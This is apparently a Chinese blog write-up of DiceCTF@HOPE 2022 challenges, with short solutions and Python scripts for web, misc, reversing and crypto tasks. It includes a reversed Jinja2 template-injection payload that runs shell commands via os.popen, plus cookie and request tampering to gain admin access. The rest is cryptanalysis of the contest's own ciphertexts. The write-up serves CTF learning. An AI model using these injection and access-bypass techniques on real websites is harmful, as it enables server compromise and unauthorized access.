DiceCTF@HOPE2022

​ qwq…

Web

secure-page

抓包,把cookie改为admin。

reverser

模板注入,但是会把输入的字符串倒序排列再解析,所以我们传payload的倒序字符串即可:

1
2
print("{{lipsum.__globals__['os'].popen('ls').read()}}"[::-1])
print("{{lipsum.__globals__['os'].popen('cat f*').read()}}"[::-1])

flag-viewer

前端过滤了admin,所以随意输入一个其他用户名再抓包改为admin提交即可。

Misc

orphan

给了.git文件,但是git log无法查看历史版本,直接去log文件夹里可以看到历史版本号,diff一下就出了flag。

Rev

签到,考察选手的逆向思维。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
s = 'hope{'+ '*'*26 + '}'
l = list(s)

s1 = 'i0_tnl3a0'
s2 = '{0p0lsl'
s3 = 'e0y_3l'
s4 = '_vph_is_t'
s5 = 'ley0sc_l}'
for i in range(5,32,3):
    l[i] = s1[(i-5)//3]
for i in range(4,32,4):
    l[i] = s2[(i-4)//4]
for i in range(3,32,5):
    l[i] = s3[(i-3)//5]
for i in range(6,32,3):
    l[i] = s4[(i-6)//3]
for i in range(7,32,3):
    l[i] = s5[(i-7)//3]
print(''.join(l))

Crypto

obp

用前几个字节异或求出key再还原明文:

1
2
3
4
5
6
7
8
9
10
import binascii

c = 'babda2b7a9bcbda68db38dbebda68dbdb48db9b7aba18dbfb6a2aaa7a3beb1a2bfb7b5a3a7afd8'
cc = binascii.unhexlify(c)
start = b'hope{'
for i in range(5):
    print(start[i]^cc[i],end=' ')

for i in range(len(cc)):
    print(chr(210^cc[i]),end='')

pem

会用pem格式解密即可:

1
2
3
4
5
6
7
8
9
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
# ssl格式加密则用ssl格式去解密
cipher_text = open(r"encrypted.bin", "rb").read()
ciphertxt = cipher_text
key = RSA.importKey(open(r"privatekey.pem").read())
cipher = PKCS1_OAEP.new(key)
message = cipher.decrypt(ciphertxt)
print(message)

kfb

密钥是用随机数加密得到的,但密钥和明文异或即是密文,所以可以向服务器发一个全为0的分组,这样加密的结果就是密钥;用密钥解密即可:

1
2
3
4
5
6
7
8
9
10
from Crypto.Util.strxor import strxor

c=bytes.fromhex('e9bef46282bef742e3ae31956add4d04f2a5ed64928ae54fe3ae2d8f79d77633e48eef6996a2e27fdeee6acf27d54b6ce4e9bc349cb1a414c1da5efd18b62e5c')
key=bytes.fromhex('81d18407f9d59120bcdd59fa1fb1295b91c19417e9c58130accd49ea0fa1394b'[:32])
print(key)
m=b''
print(len(key))
for i in range(0,len(c),16):
    m+=strxor(c[i:i+16],key)
print(m)

DESpicable you

先用flag格式还原key的前几个字节,再爆破:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
from tqdm import tqdm

def encipher(a,b):
    c = ''
    for i, j in zip(a,b):
        c+=chr(i^j)
    return c

def rekey(key):
    k = []
    for i,c in enumerate(key):
        if i == len(key)-1:
            k .append(c)
            k.append(c^key[0])
        else:
            k.append(c)
            k.append(c^key[i+1])
    key = k

table='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!_}'
f=open('des_out.txt','rb')
c=f.read()
print(len(c))
t=b'hope{'
# 部分key
for i in range(5):
    print(t[i]^c[i])

for ii in tqdm(range(256)):
    for jj in range(256):
        for kk in range(256):
            key = [136, 21, 3, 141, 80, ii, jj, kk]
            i = 0
            ct = ''
            while i < len(c):
                ct += encipher(c[i:i + len(key)], key)
                i += len(key)
                rekey(key)
            sign=ct[5:40]
            for ll in range(len(sign)):
                if sign[ll] not in table:
                    break
            else:
                print(ct)

reverse-rsa

和seetf的有一道题差不多,这里是给了c,自己选择一个满足格式的明文m,以及光滑的p和q(p-h算法),来快速求解e(离散对数),提交给服务器即可通过验证。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
from Crypto.Util.number import *
# 注意给服务端是小端转字节
flag = b'}ghfedcba{epoh'
m = bytes_to_long(flag)

c = 7146993245951509380139759140890681816862856635262037632915667109712467317954902955151177421740994622238561522690931235839733579166121631742096762557444153806131985279962646477997889661633938981817306610901055296705982494607773446985300816341071922739788638126631520234249358834592814880445497817389957300553660499631838091201561728727996660871094966330045071879490277901216751327226984526095495604592577841120425249633624459211547984305731778854596177467026282357094690700361174790351699376317810120824316300666128090632100150965101285647544696152528364989155735157261219949095760495520390692941417167332814540685297
p = 314159265358979300000000000000000010539
q = 271828182845904500000000000000000000701
n = p*q

G =GF(p)
g = G(c)
h = G(m)
k1 = discrete_log(g,h)
print(k1)

G1 = GF(q)
g1 = G1(c)
h1 = G1(m)
k2 = discrete_log(g1,h1)
print(k2)

e = crt([k1,k2],[p-1,q-1])
print(e)

# 本地测试
# c = 7146993245951509380139759140890681816862856635262037632915667109712467317954902955151177421740994622238561522690931235839733579166121631742096762557444153806131985279962646477997889661633938981817306610901055296705982494607773446985300816341071922739788638126631520234249358834592814880445497817389957300553660499631838091201561728727996660871094966330045071879490277901216751327226984526095495604592577841120425249633624459211547984305731778854596177467026282357094690700361174790351699376317810120824316300666128090632100150965101285647544696152528364989155735157261219949095760495520390692941417167332814540685297
# e = 6512502510386120305172284395400191873576185305514434873168303156181088575639
# p = 314159265358979300000000000000000010539
# q = 271828182845904500000000000000000000701
# n = p*q
#
# phi = (p-1)*(q-1)
# d = invert(e,phi)
# mm = int(pow(c,d,n))
# print(int.to_bytes(mm, 256, 'little'))

扫一扫,分享到微信

微信分享二维码
本站总访问量: 总访客次数:

tag:

梦想是成为全栈佬并养一只猫